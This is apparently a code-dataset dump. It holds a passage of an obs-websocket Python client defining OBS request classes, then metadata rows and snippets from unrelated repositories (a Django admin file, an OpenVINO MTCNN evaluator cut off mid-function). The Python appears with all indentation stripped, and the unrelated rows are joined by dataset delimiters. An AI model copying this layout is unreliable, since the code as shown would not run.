Whether the recording is paused or not.
*recordTimecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*recordingFilename*
type: String (optional)
Absolute path to the recording file (only present if currently recording).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingStatus'
self.datain['isRecording'] = None
self.datain['isRecordingPaused'] = None
self.datain['recordTimecode'] = None
self.datain['recordingFilename'] = None
def getIsRecording(self):
return self.datain['isRecording']
def getIsRecordingPaused(self):
return self.datain['isRecordingPaused']
def getRecordTimecode(self):
return self.datain['recordTimecode']
def getRecordingFilename(self):
return self.datain['recordingFilename']
class StartStopRecording(Baserequests):
"""Toggle recording on or off (depending on the current recording state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopRecording'
class StartRecording(Baserequests):
"""Start recording.
Will return an `error` if recording is already active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartRecording'
class StopRecording(Baserequests):
"""Stop recording.
Will return an `error` if recording is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopRecording'
class PauseRecording(Baserequests):
"""Pause the current recording.
Returns an error if recording is not active or already paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'PauseRecording'
class ResumeRecording(Baserequests):
"""Resume/unpause the current recording (if paused).
Returns an error if recording is not active or not paused.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ResumeRecording'
class SetRecordingFolder(Baserequests):
"""
Please note: if `SetRecordingFolder` is called while a recording is
in progress, the change won't be applied immediately and will be
effective on the next recording.
:Arguments:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self, rec_folder):
Baserequests.__init__(self)
self.name = 'SetRecordingFolder'
self.dataout['rec-folder'] = rec_folder
class GetRecordingFolder(Baserequests):
"""Get the path of the current recording folder.
:Returns:
*rec_folder*
type: String
Path of the recording folder.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetRecordingFolder'
self.datain['rec-folder'] = None
def getRecFolder(self):
return self.datain['rec-folder']
class GetReplayBufferStatus(Baserequests):
"""Get the status of the OBS replay buffer.
:Returns:
*isReplayBufferActive*
type: boolean
Current recording status.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetReplayBufferStatus'
self.datain['isReplayBufferActive'] = None
def getIsReplayBufferActive(self):
return self.datain['isReplayBufferActive']
class StartStopReplayBuffer(Baserequests):
"""Toggle the Replay Buffer on/off (depending on the current state of the replay buffer).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopReplayBuffer'
class StartReplayBuffer(Baserequests):
"""Start recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is already active or if the
"Save Replay Buffer" hotkey is not set in OBS' settings.
Setting this hotkey is mandatory, even when triggering saves only
through obs-websocket.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartReplayBuffer'
class StopReplayBuffer(Baserequests):
"""Stop recording into the Replay Buffer.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopReplayBuffer'
class SaveReplayBuffer(Baserequests):
"""Flush and save the contents of the Replay Buffer to disk. This is
basically the same as triggering the "Save Replay Buffer" hotkey.
Will return an `error` if the Replay Buffer is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveReplayBuffer'
class SetCurrentSceneCollection(Baserequests):
"""Change the active scene collection.
:Arguments:
*sc_name*
type: String
Name of the desired scene collection.
"""
def __init__(self, sc_name):
Baserequests.__init__(self)
self.name = 'SetCurrentSceneCollection'
self.dataout['sc-name'] = sc_name
class GetCurrentSceneCollection(Baserequests):
"""Get the name of the current scene collection.
:Returns:
*sc_name*
type: String
Name of the currently active scene collection.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentSceneCollection'
self.datain['sc-name'] = None
def getScName(self):
return self.datain['sc-name']
class ListSceneCollections(Baserequests):
"""List available scene collections
:Returns:
*scene_collections*
type: Array<String>
Scene collections list
*scene_collections.*.sc_name*
type: String
Scene collection name
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ListSceneCollections'
self.datain['scene-collections'] = None
def getSceneCollections(self):
return self.datain['scene-collections']
class GetSceneItemList(Baserequests):
"""Get a list of all scene items in a scene.
:Arguments:
*sceneName*
type: String (optional)
Name of the scene to get the list of scene items from. Defaults to the current scene if not specified.
:Returns:
*sceneName*
type: String
Name of the requested (or current) scene
*sceneItems*
type: Array<Object>
Array of scene items
*sceneItems.*.itemId*
type: int
Unique item id of the source item
*sceneItems.*.sourceKind*
type: String
ID if the scene item's source. For example `vlc_source` or `image_source`
*sceneItems.*.sourceName*
type: String
Name of the scene item's source
*sceneItems.*.sourceType*
type: String
Type of the scene item's source. Either `input`, `group`, or `scene`
"""
def __init__(self, sceneName=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemList'
self.datain['sceneName'] = None
self.datain['sceneItems'] = None
self.dataout['sceneName'] = sceneName
def getSceneName(self):
return self.datain['sceneName']
def getSceneItems(self):
return self.datain['sceneItems']
class GetSceneItemProperties(Baserequests):
"""Gets the scene specific properties of the specified source item.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
:Returns:
*name*
type: String
Scene Item name.
*itemId*
type: int
Scene Item ID.
*position.x*
type: double
The x position of the source from the left.
*position.y*
type: double
The y position of the source from the top.
*position.alignment*
type: int
The point on the source that the item is manipulated from. The sum of 1=Left or 2=Right, and 4=Top or 8=Bottom, or omit to center on that axis.
*rotation*
type: double
The clockwise rotation of the item in degrees around the point of alignment.
*scale.x*
type: double
The x-scale factor of the source.
*scale.y*
type: double
The y-scale factor of the source.
*crop.top*
type: int
The number of pixels cropped off the top of the source before scaling.
*crop.right*
type: int
The number of pixels cropped off the right of the source before scaling.
*crop.bottom*
type: int
The number of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int
The number of pixels cropped off the left of the source before scaling.
*visible*
type: bool
If the source is visible.
*muted*
type: bool
If the source is muted.
*locked*
type: bool
If the source's transform is locked.
*bounds.type*
type: String
Type of bounding box. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int
Alignment of the bounding box.
*bounds.x*
type: double
Width of the bounding box.
*bounds.y*
type: double
Height of the bounding box.
*sourceWidth*
type: int
Base width (without scaling) of the source
*sourceHeight*
type: int
Base source (without scaling) of the source
*width*
type: double
Scene item width (base source width multiplied by the horizontal scaling factor)
*height*
type: double
Scene item height (base source height multiplied by the vertical scaling factor)
*parentGroupName*
type: String (optional)
Name of the item's parent (if this item belongs to a group)
*groupChildren*
type: Array<SceneItemTransform> (optional)
List of children (if this item is a group)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'GetSceneItemProperties'
self.datain['name'] = None
self.datain['itemId'] = None
self.datain['position'] = None
self.datain['rotation'] = None
self.datain['scale'] = None
self.datain['crop'] = None
self.datain['visible'] = None
self.datain['muted'] = None
self.datain['locked'] = None
self.datain['bounds'] = None
self.datain['sourceWidth'] = None
self.datain['sourceHeight'] = None
self.datain['width'] = None
self.datain['height'] = None
self.datain['parentGroupName'] = None
self.datain['groupChildren'] = None
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
def getName(self):
return self.datain['name']
def getItemId(self):
return self.datain['itemId']
def getPosition(self):
return self.datain['position']
def getRotation(self):
return self.datain['rotation']
def getScale(self):
return self.datain['scale']
def getCrop(self):
return self.datain['crop']
def getVisible(self):
return self.datain['visible']
def getMuted(self):
return self.datain['muted']
def getLocked(self):
return self.datain['locked']
def getBounds(self):
return self.datain['bounds']
def getSourceWidth(self):
return self.datain['sourceWidth']
def getSourceHeight(self):
return self.datain['sourceHeight']
def getWidth(self):
return self.datain['width']
def getHeight(self):
return self.datain['height']
def getParentGroupName(self):
return self.datain['parentGroupName']
def getGroupChildren(self):
return self.datain['groupChildren']
class SetSceneItemProperties(Baserequests):
"""Sets the scene specific properties of a source. Unspecified properties will remain unchanged.
Coordinates are relative to the item's parent (the scene or group it belongs to).
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the source item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
*position.x*
type: double (optional)
The new x position of the source.
*position.y*
type: double (optional)
The new y position of the source.
*position.alignment*
type: int (optional)
The new alignment of the source.
*rotation*
type: double (optional)
The new clockwise rotation of the item in degrees.
*scale.x*
type: double (optional)
The new x scale of the item.
*scale.y*
type: double (optional)
The new y scale of the item.
*crop.top*
type: int (optional)
The new amount of pixels cropped off the top of the source before scaling.
*crop.bottom*
type: int (optional)
The new amount of pixels cropped off the bottom of the source before scaling.
*crop.left*
type: int (optional)
The new amount of pixels cropped off the left of the source before scaling.
*crop.right*
type: int (optional)
The new amount of pixels cropped off the right of the source before scaling.
*visible*
type: bool (optional)
The new visibility of the source. 'true' shows source, 'false' hides source.
*locked*
type: bool (optional)
The new locked status of the source. 'true' keeps it in its current position, 'false' allows movement.
*bounds.type*
type: String (optional)
The new bounds type of the source. Can be "OBS_BOUNDS_STRETCH", "OBS_BOUNDS_SCALE_INNER", "OBS_BOUNDS_SCALE_OUTER", "OBS_BOUNDS_SCALE_TO_WIDTH", "OBS_BOUNDS_SCALE_TO_HEIGHT", "OBS_BOUNDS_MAX_ONLY" or "OBS_BOUNDS_NONE".
*bounds.alignment*
type: int (optional)
The new alignment of the bounding box. (0-2, 4-6, 8-10)
*bounds.x*
type: double (optional)
The new width of the bounding box.
*bounds.y*
type: double (optional)
The new height of the bounding box.
"""
def __init__(self, item, scene_name=None, position=None, rotation=None, scale=None, crop=None, visible=None, locked=None, bounds=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemProperties'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
self.dataout['position'] = position
self.dataout['rotation'] = rotation
self.dataout['scale'] = scale
self.dataout['crop'] = crop
self.dataout['visible'] = visible
self.dataout['locked'] = locked
self.dataout['bounds'] = bounds
class ResetSceneItem(Baserequests):
"""Reset a scene item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String | Object
Scene Item name (if this field is a string) or specification (if it is an object).
*item.name*
type: String (optional)
Scene Item name (if the `item` field is an object)
*item.id*
type: int (optional)
Scene Item ID (if the `item` field is an object)
"""
def __init__(self, item, scene_name=None):
Baserequests.__init__(self)
self.name = 'ResetSceneItem'
self.dataout['item'] = item
self.dataout['scene-name'] = scene_name
class SetSceneItemRender(Baserequests):
"""Show or hide a specified source item in a specified scene.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the currently active scene.
*source*
type: String
Scene Item name.
*render*
type: boolean
true = shown ; false = hidden
"""
def __init__(self, source, render, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemRender'
self.dataout['source'] = source
self.dataout['render'] = render
self.dataout['scene-name'] = scene_name
class SetSceneItemPosition(Baserequests):
"""Sets the coordinates of a specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x*
type: double
X coordinate.
*y*
type: double
Y coordinate.
"""
def __init__(self, item, x, y, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemPosition'
self.dataout['item'] = item
self.dataout['x'] = x
self.dataout['y'] = y
self.dataout['scene-name'] = scene_name
class SetSceneItemTransform(Baserequests):
"""Set the transform of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*x_scale*
type: double
Width scale factor.
*y_scale*
type: double
Height scale factor.
*rotation*
type: double
Source item rotation (in degrees).
"""
def __init__(self, item, x_scale, y_scale, rotation, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemTransform'
self.dataout['item'] = item
self.dataout['x-scale'] = x_scale
self.dataout['y-scale'] = y_scale
self.dataout['rotation'] = rotation
self.dataout['scene-name'] = scene_name
class SetSceneItemCrop(Baserequests):
"""Sets the crop coordinates of the specified source item.
:Arguments:
*scene_name*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: String
Scene Item name.
*top*
type: int
Pixel position of the top of the source item.
*bottom*
type: int
Pixel position of the bottom of the source item.
*left*
type: int
Pixel position of the left of the source item.
*right*
type: int
Pixel position of the right of the source item.
"""
def __init__(self, item, top, bottom, left, right, scene_name=None):
Baserequests.__init__(self)
self.name = 'SetSceneItemCrop'
self.dataout['item'] = item
self.dataout['top'] = top
self.dataout['bottom'] = bottom
self.dataout['left'] = left
self.dataout['right'] = right
self.dataout['scene-name'] = scene_name
class DeleteSceneItem(Baserequests):
"""Deletes a scene item.
:Arguments:
*scene*
type: String (optional)
Name of the scene the scene item belongs to. Defaults to the current scene.
*item*
type: Object
Scene item to delete (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
"""
def __init__(self, item, scene=None):
Baserequests.__init__(self)
self.name = 'DeleteSceneItem'
self.dataout['item'] = item
self.dataout['scene'] = scene
class AddSceneItem(Baserequests):
"""Creates a scene item in a scene. In other words, this is how you add a source into a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create the scene item in
*sourceName*
type: String
Name of the source to be added
*setVisible*
type: boolean
Whether to make the sceneitem visible on creation or not. Default `true`
:Returns:
*itemId*
type: int
Numerical ID of the created scene item
"""
def __init__(self, sceneName, sourceName, setVisible):
Baserequests.__init__(self)
self.name = 'AddSceneItem'
self.datain['itemId'] = None
self.dataout['sceneName'] = sceneName
self.dataout['sourceName'] = sourceName
self.dataout['setVisible'] = setVisible
def getItemId(self):
return self.datain['itemId']
class DuplicateSceneItem(Baserequests):
"""Duplicates a scene item.
:Arguments:
*fromScene*
type: String (optional)
Name of the scene to copy the item from. Defaults to the current scene.
*toScene*
type: String (optional)
Name of the scene to create the item in. Defaults to the current scene.
*item*
type: Object
Scene Item to duplicate from the source scene (required)
*item.name*
type: String
Scene Item name (prefer `id`, including both is acceptable).
*item.id*
type: int
Scene Item ID.
:Returns:
*scene*
type: String
Name of the scene where the new item was created
*item*
type: Object
New item info
*item.id*
type: int
New item ID
*item.name*
type: String
New item name
"""
def __init__(self, item, fromScene=None, toScene=None):
Baserequests.__init__(self)
self.name = 'DuplicateSceneItem'
self.datain['scene'] = None
self.datain['item'] = None
self.dataout['item'] = item
self.dataout['fromScene'] = fromScene
self.dataout['toScene'] = toScene
def getScene(self):
return self.datain['scene']
def getItem(self):
return self.datain['item']
class SetCurrentScene(Baserequests):
"""Switch to the specified scene.
:Arguments:
*scene_name*
type: String
Name of the scene to switch to.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetCurrentScene'
self.dataout['scene-name'] = scene_name
class GetCurrentScene(Baserequests):
"""Get the current scene's name and source items.
:Returns:
*name*
type: String
Name of the currently active scene.
*sources*
type: Array<SceneItem>
Ordered list of the current scene's source items.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class GetSceneList(Baserequests):
"""Get a list of scenes in the currently active profile.
:Returns:
*current_scene*
type: String
Name of the currently active scene.
*scenes*
type: Array<Scene>
Ordered list of the current profile's scenes (See [GetCurrentScene](#getcurrentscene) for more information).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetSceneList'
self.datain['current-scene'] = None
self.datain['scenes'] = None
def getCurrentScene(self):
return self.datain['current-scene']
def getScenes(self):
return self.datain['scenes']
class CreateScene(Baserequests):
"""Create a new scene scene.
:Arguments:
*sceneName*
type: String
Name of the scene to create.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'CreateScene'
self.dataout['sceneName'] = sceneName
class ReorderSceneItems(Baserequests):
"""Changes the order of scene items in the requested scene.
:Arguments:
*scene*
type: String (optional)
Name of the scene to reorder (defaults to current).
*items*
type: Array<Scene>
Ordered list of objects with name and/or id specified. Id preferred due to uniqueness per scene
*items.*.id*
type: int (optional)
Id of a specific scene item. Unique on a scene by scene basis.
*items.*.name*
type: String (optional)
Name of a scene item. Sufficiently unique if no scene items share sources within the scene.
"""
def __init__(self, items, scene=None):
Baserequests.__init__(self)
self.name = 'ReorderSceneItems'
self.dataout['items'] = items
self.dataout['scene'] = scene
class SetSceneTransitionOverride(Baserequests):
"""Set a scene to use a specific transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
*transitionName*
type: String
Name of the transition to use.
*transitionDuration*
type: int (Optional)
Duration in milliseconds of the transition if transition is not fixed. Defaults to the current duration specified in the UI if there is no current override and this value is not given.
"""
def __init__(self, sceneName, transitionName, transitionDuration):
Baserequests.__init__(self)
self.name = 'SetSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
self.dataout['transitionName'] = transitionName
self.dataout['transitionDuration'] = transitionDuration
class RemoveSceneTransitionOverride(Baserequests):
"""Remove any transition override on a scene.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'RemoveSceneTransitionOverride'
self.dataout['sceneName'] = sceneName
class GetSceneTransitionOverride(Baserequests):
"""Get the current scene transition override.
:Arguments:
*sceneName*
type: String
Name of the scene to switch to.
:Returns:
*transitionName*
type: String
Name of the current overriding transition. Empty string if no override is set.
*transitionDuration*
type: int
Transition duration. `-1` if no override is set.
"""
def __init__(self, sceneName):
Baserequests.__init__(self)
self.name = 'GetSceneTransitionOverride'
self.datain['transitionName'] = None
self.datain['transitionDuration'] = None
self.dataout['sceneName'] = sceneName
def getTransitionName(self):
return self.datain['transitionName']
def getTransitionDuration(self):
return self.datain['transitionDuration']
class GetStreamingStatus(Baserequests):
"""Get current streaming and recording status.
:Returns:
*streaming*
type: boolean
Current streaming status.
*recording*
type: boolean
Current recording status.
*stream_timecode*
type: String (optional)
Time elapsed since streaming started (only present if currently streaming).
*rec_timecode*
type: String (optional)
Time elapsed since recording started (only present if currently recording).
*preview_only*
type: boolean
Always false. Retrocompatibility with OBSRemote.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamingStatus'
self.datain['streaming'] = None
self.datain['recording'] = None
self.datain['stream-timecode'] = None
self.datain['rec-timecode'] = None
self.datain['preview-only'] = None
def getStreaming(self):
return self.datain['streaming']
def getRecording(self):
return self.datain['recording']
def getStreamTimecode(self):
return self.datain['stream-timecode']
def getRecTimecode(self):
return self.datain['rec-timecode']
def getPreviewOnly(self):
return self.datain['preview-only']
class StartStopStreaming(Baserequests):
"""Toggle streaming on or off (depending on the current stream state).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StartStopStreaming'
class StartStreaming(Baserequests):
"""Start streaming.
Will return an `error` if streaming is already active.
:Arguments:
*stream*
type: Object (optional)
Special stream configuration. Please note: these won't be saved to OBS' configuration.
*stream.type*
type: String (optional)
If specified ensures the type of stream matches the given type (usually 'rtmp_custom' or 'rtmp_common'). If the currently configured stream type does not match the given stream type, all settings must be specified in the `settings` object or an error will occur when starting the stream.
*stream.metadata*
type: Object (optional)
Adds the given object parameters as encoded query string parameters to the 'key' of the RTMP stream. Used to pass data to the RTMP service about the streaming. May be any String, Numeric, or Boolean field.
*stream.settings*
type: Object (optional)
Settings for the stream.
*stream.settings.server*
type: String (optional)
The publish URL.
*stream.settings.key*
type: String (optional)
The publish key of the stream.
*stream.settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*stream.settings.username*
type: String (optional)
If authentication is enabled, the username for the streaming server. Ignored if `use_auth` is not set to `true`.
*stream.settings.password*
type: String (optional)
If authentication is enabled, the password for the streaming server. Ignored if `use_auth` is not set to `true`.
"""
def __init__(self, stream=None):
Baserequests.__init__(self)
self.name = 'StartStreaming'
self.dataout['stream'] = stream
class StopStreaming(Baserequests):
"""Stop streaming.
Will return an `error` if streaming is not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'StopStreaming'
class SetStreamSettings(Baserequests):
"""Sets one or more attributes of the current streaming server settings. Any options not passed will remain unchanged. Returns the updated settings in response. If 'type' is different than the current streaming service type, all settings are required. Returns the full settings of the stream (the same as GetStreamSettings).
:Arguments:
*type*
type: String
The type of streaming service configuration, usually `rtmp_custom` or `rtmp_common`.
*settings*
type: Object
The actual settings of the stream.
*settings.server*
type: String (optional)
The publish URL.
*settings.key*
type: String (optional)
The publish key.
*settings.use_auth*
type: boolean (optional)
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String (optional)
The username for the streaming service.
*settings.password*
type: String (optional)
The password for the streaming service.
*save*
type: boolean
Persist the settings to disk.
"""
def __init__(self, type, settings, save):
Baserequests.__init__(self)
self.name = 'SetStreamSettings'
self.dataout['type'] = type
self.dataout['settings'] = settings
self.dataout['save'] = save
class GetStreamSettings(Baserequests):
"""Get the current streaming server settings.
:Returns:
*type*
type: String
The type of streaming service configuration. Possible values: 'rtmp_custom' or 'rtmp_common'.
*settings*
type: Object
Stream settings object.
*settings.server*
type: String
The publish URL.
*settings.key*
type: String
The publish key of the stream.
*settings.use_auth*
type: boolean
Indicates whether authentication should be used when connecting to the streaming server.
*settings.username*
type: String
The username to use when accessing the streaming server. Only present if `use_auth` is `true`.
*settings.password*
type: String
The password to use when accessing the streaming server. Only present if `use_auth` is `true`.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStreamSettings'
self.datain['type'] = None
self.datain['settings'] = None
def getType(self):
return self.datain['type']
def getSettings(self):
return self.datain['settings']
class SaveStreamSettings(Baserequests):
"""Save the current streaming server settings to disk.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'SaveStreamSettings'
class SendCaptions(Baserequests):
"""Send the provided text as embedded CEA-608 caption data.
:Arguments:
*text*
type: String
Captions text
"""
def __init__(self, text):
Baserequests.__init__(self)
self.name = 'SendCaptions'
self.dataout['text'] = text
class GetStudioModeStatus(Baserequests):
"""Indicates if Studio Mode is currently enabled.
:Returns:
*studio_mode*
type: boolean
Indicates if Studio Mode is enabled.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetStudioModeStatus'
self.datain['studio-mode'] = None
def getStudioMode(self):
return self.datain['studio-mode']
class GetPreviewScene(Baserequests):
"""Get the name of the currently previewed scene and its list of sources.
Will return an `error` if Studio Mode is not enabled.
:Returns:
*name*
type: String
The name of the active preview scene.
*sources*
type: Array<SceneItem>
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetPreviewScene'
self.datain['name'] = None
self.datain['sources'] = None
def getName(self):
return self.datain['name']
def getSources(self):
return self.datain['sources']
class SetPreviewScene(Baserequests):
"""Set the active preview scene.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*scene_name*
type: String
The name of the scene to preview.
"""
def __init__(self, scene_name):
Baserequests.__init__(self)
self.name = 'SetPreviewScene'
self.dataout['scene-name'] = scene_name
class TransitionToProgram(Baserequests):
"""Transitions the currently previewed scene to the main output.
Will return an `error` if Studio Mode is not enabled.
:Arguments:
*with_transition*
type: Object (optional)
Change the active transition before switching scenes. Defaults to the active transition.
*with_transition.name*
type: String
Name of the transition.
*with_transition.duration*
type: int (optional)
Transition duration (in milliseconds).
"""
def __init__(self, with_transition=None):
Baserequests.__init__(self)
self.name = 'TransitionToProgram'
self.dataout['with-transition'] = with_transition
class EnableStudioMode(Baserequests):
"""Enables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'EnableStudioMode'
class DisableStudioMode(Baserequests):
"""Disables Studio Mode.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'DisableStudioMode'
class ToggleStudioMode(Baserequests):
"""Toggles Studio Mode (depending on the current state of studio mode).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ToggleStudioMode'
class GetTransitionList(Baserequests):
"""List of all transitions available in the frontend's dropdown menu.
:Returns:
*current_transition*
type: String
Name of the currently active transition.
*transitions*
type: Array<Object>
List of transitions.
*transitions.*.name*
type: String
Name of the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionList'
self.datain['current-transition'] = None
self.datain['transitions'] = None
def getCurrentTransition(self):
return self.datain['current-transition']
def getTransitions(self):
return self.datain['transitions']
class GetCurrentTransition(Baserequests):
"""Get the name of the currently selected transition in the frontend's dropdown menu.
:Returns:
*name*
type: String
Name of the selected transition.
*duration*
type: int (optional)
Transition duration (in milliseconds) if supported by the transition.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetCurrentTransition'
self.datain['name'] = None
self.datain['duration'] = None
def getName(self):
return self.datain['name']
def getDuration(self):
return self.datain['duration']
class SetCurrentTransition(Baserequests):
"""Set the active transition.
:Arguments:
*transition_name*
type: String
The name of the transition.
"""
def __init__(self, transition_name):
Baserequests.__init__(self)
self.name = 'SetCurrentTransition'
self.dataout['transition-name'] = transition_name
class SetTransitionDuration(Baserequests):
"""Set the duration of the currently selected transition if supported.
:Arguments:
*duration*
type: int
Desired duration of the transition (in milliseconds).
"""
def __init__(self, duration):
Baserequests.__init__(self)
self.name = 'SetTransitionDuration'
self.dataout['duration'] = duration
class GetTransitionDuration(Baserequests):
"""Get the duration of the currently selected transition if supported.
:Returns:
*transition_duration*
type: int
Duration of the current transition (in milliseconds).
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionDuration'
self.datain['transition-duration'] = None
def getTransitionDuration(self):
return self.datain['transition-duration']
class GetTransitionPosition(Baserequests):
"""Get the position of the current transition.
:Returns:
*position*
type: double
current transition position. This value will be between 0.0 and 1.0. Note: Transition returns 1.0 when not active.
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'GetTransitionPosition'
self.datain['position'] = None
def getPosition(self):
return self.datain['position']
class GetTransitionSettings(Baserequests):
"""Get the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
:Returns:
*transitionSettings*
type: Object
Current transition settings
"""
def __init__(self, transitionName):
Baserequests.__init__(self)
self.name = 'GetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
def getTransitionSettings(self):
return self.datain['transitionSettings']
class SetTransitionSettings(Baserequests):
"""Change the current settings of a transition
:Arguments:
*transitionName*
type: String
Transition name
*transitionSettings*
type: Object
Transition settings (they can be partial)
:Returns:
*transitionSettings*
type: Object
Updated transition settings
"""
def __init__(self, transitionName, transitionSettings):
Baserequests.__init__(self)
self.name = 'SetTransitionSettings'
self.datain['transitionSettings'] = None
self.dataout['transitionName'] = transitionName
self.dataout['transitionSettings'] = transitionSettings
def getTransitionSettings(self):
return self.datain['transitionSettings']
class ReleaseTBar(Baserequests):
"""Release the T-Bar (like a user releasing their mouse button after moving it).
*YOU MUST CALL THIS if you called `SetTBarPosition` with the `release` parameter set to `false`.*
"""
def __init__(self):
Baserequests.__init__(self)
self.name = 'ReleaseTBar'
class SetTBarPosition(Baserequests):
"""
If your code needs to perform multiple successive T-Bar moves (e.g. : in an animation, or in response to a user moving a T-Bar control in your User Interface), set `release` to false and call `ReleaseTBar` later once the animation/interaction is over.
:Arguments:
*position*
type: double
T-Bar position. This value must be between 0.0 and 1.0.
*release*
type: boolean (optional)
Whether or not the T-Bar gets released automatically after setting its new position (like a user releasing their mouse button after moving the T-Bar). Call `ReleaseTBar` manually if you set `release` to false. Defaults to true.
"""
def __init__(self, position, release=None):
Baserequests.__init__(self)
self.name = 'SetTBarPosition'
self.dataout['position'] = position
self.dataout['release'] = release
| [] |
rdurica/django-simple-history | simple_history/tests/custom_user/admin.py | 84d17f40be68e9ac7744b773451be83720c4c13a | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import CustomUser
admin.site.register(CustomUser, UserAdmin)
| [((6, 0, 6, 42), 'django.contrib.admin.site.register', 'admin.site.register', ({(6, 20, 6, 30): 'CustomUser', (6, 32, 6, 41): 'UserAdmin'}, {}), '(CustomUser, UserAdmin)', False, 'from django.contrib import admin\n')] |
Pandinosaurus/open_model_zoo | tools/accuracy_checker/openvino/tools/accuracy_checker/evaluators/custom_evaluators/mtcnn_evaluator_utils.py | 2543996541346418919c5cddfb71e33e2cdef080 | """
Copyright (c) 2018-2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import OrderedDict
import cv2
import numpy as np
from ...adapters import MTCNNPAdapter
def calibrate_predictions(previous_stage_predictions, out, threshold, outputs_mapping, iou_type=None):
prob_out = outputs_mapping['probability_out']
if prob_out not in out[0]:
prob_out = prob_out + '/sink_port_0' if '/sink_port_0' not in prob_out else prob_out.replace('/sink_port_0', '')
score = out[0][prob_out][:, 1]
pass_t = np.where(score > 0.7)[0]
removed_boxes = [i for i in range(previous_stage_predictions[0].size) if i not in pass_t]
